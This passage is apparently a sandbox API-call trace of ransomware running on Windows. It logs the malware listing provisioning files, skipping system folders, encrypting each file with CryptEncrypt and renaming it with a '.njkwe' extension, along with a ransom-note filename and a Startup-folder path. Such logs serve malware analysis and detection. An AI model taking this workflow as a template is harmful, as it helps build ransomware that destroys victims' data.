[0081.873] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.873] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.873] CloseHandle (hObject=0x444) returned 1 [0081.873] GetProcessHeap () returned 0xbe0000 [0081.873] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.873] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0081.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\536__connections_cellular_orange (spain)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\536__Connections_Cellular_Orange (Spain)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\536__connections_cellular_orange (spain)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.874] GetProcessHeap () returned 0xbe0000 [0081.874] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.874] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9131f086, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9131f086, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913452f1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml", cAlternateFileName="537__C~1.PRO")) returned 1 [0081.874] lstrcmpiW (lpString1="537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.874] lstrcmpiW (lpString1="537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.874] lstrcmpiW (lpString1="537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.874] lstrcmpiW (lpString1="537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.874] lstrcmpiW (lpString1="537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.874] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml") returned 161 [0081.874] StrStrIW (lpFirst="537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.874] lstrcmpW (lpString1="537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.874] lstrcmpW (lpString1="537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.874] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\537__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.874] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\537__connections_cellular_orange (botswana)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.875] GetTickCount () returned 0x1154c67 [0081.875] GetTickCount () returned 0x1154c67 [0081.875] GetTickCount () returned 0x1154c67 [0081.875] GetTickCount () returned 0x1154c67 [0081.875] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.875] GetProcessHeap () returned 0xbe0000 [0081.875] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.875] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0081.878] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.878] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0081.878] GetProcessHeap () returned 0xbe0000 [0081.878] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.878] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.878] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.878] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.878] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.878] CloseHandle (hObject=0x444) returned 1 [0081.879] GetProcessHeap () returned 0xbe0000 [0081.879] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.879] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0081.879] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\537__connections_cellular_orange (botswana)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\537__Connections_Cellular_Orange (Botswana)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\537__connections_cellular_orange (botswana)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.879] GetProcessHeap () returned 0xbe0000 [0081.879] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.879] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913452f1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913452f1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913452f1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml", cAlternateFileName="538__C~1.PRO")) returned 1 [0081.879] lstrcmpiW (lpString1="538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.879] lstrcmpiW (lpString1="538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.880] lstrcmpiW (lpString1="538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.880] lstrcmpiW (lpString1="538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.880] lstrcmpiW (lpString1="538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.880] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml") returned 161 [0081.880] StrStrIW (lpFirst="538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.880] lstrcmpW (lpString1="538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.880] lstrcmpW (lpString1="538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.880] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\538__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.880] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\538__connections_cellular_orange (cameroon)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.880] GetTickCount () returned 0x1154c76 [0081.880] GetTickCount () returned 0x1154c76 [0081.880] GetTickCount () returned 0x1154c76 [0081.880] GetTickCount () returned 0x1154c76 [0081.880] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.880] GetProcessHeap () returned 0xbe0000 [0081.880] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.880] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x34f, lpOverlapped=0x0) returned 1 [0081.882] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcb1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.882] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x34f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x34f, lpOverlapped=0x0) returned 1 [0081.882] GetProcessHeap () returned 0xbe0000 [0081.882] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.882] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.882] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.882] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.882] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.882] CloseHandle (hObject=0x444) returned 1 [0081.882] GetProcessHeap () returned 0xbe0000 [0081.882] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.882] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0081.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\538__connections_cellular_orange (cameroon)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\538__Connections_Cellular_Orange (Cameroon)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\538__connections_cellular_orange (cameroon)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.883] GetProcessHeap () returned 0xbe0000 [0081.883] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.883] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913452f1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913452f1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913452f1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml", cAlternateFileName="539__C~1.PRO")) returned 1 [0081.883] lstrcmpiW (lpString1="539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.883] lstrcmpiW (lpString1="539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.883] lstrcmpiW (lpString1="539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.883] lstrcmpiW (lpString1="539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.883] lstrcmpiW (lpString1="539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.883] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml") returned 177 [0081.883] StrStrIW (lpFirst="539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.883] lstrcmpW (lpString1="539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.883] lstrcmpW (lpString1="539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.883] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\539__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.883] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\539__connections_cellular_orange (central african republic)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.884] GetTickCount () returned 0x1154c76 [0081.884] GetTickCount () returned 0x1154c76 [0081.884] GetTickCount () returned 0x1154c76 [0081.884] GetTickCount () returned 0x1154c76 [0081.884] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.884] GetProcessHeap () returned 0xbe0000 [0081.884] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.884] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0081.885] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.886] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0081.886] GetProcessHeap () returned 0xbe0000 [0081.886] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.886] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.886] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.886] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.886] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.886] CloseHandle (hObject=0x444) returned 1 [0081.886] GetProcessHeap () returned 0xbe0000 [0081.886] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.886] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 197 [0081.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\539__connections_cellular_orange (central african republic)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\539__Connections_Cellular_Orange (Central African Republic)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\539__connections_cellular_orange (central african republic)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.887] GetProcessHeap () returned 0xbe0000 [0081.887] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.887] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x902943e8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x902943e8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x902943e8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml", cAlternateFileName="53__CO~1.PRO")) returned 1 [0081.887] lstrcmpiW (lpString1="53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.887] lstrcmpiW (lpString1="53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.887] lstrcmpiW (lpString1="53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.887] lstrcmpiW (lpString1="53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.887] lstrcmpiW (lpString1="53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.887] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml") returned 169 [0081.887] StrStrIW (lpFirst="53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.887] lstrcmpW (lpString1="53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.887] lstrcmpW (lpString1="53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.887] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\53__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.887] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\53__connections_cellular_mascom wireless (botswana)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.888] GetTickCount () returned 0x1154c76 [0081.888] GetTickCount () returned 0x1154c76 [0081.888] GetTickCount () returned 0x1154c76 [0081.888] GetTickCount () returned 0x1154c76 [0081.888] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.888] GetProcessHeap () returned 0xbe0000 [0081.888] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.888] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, 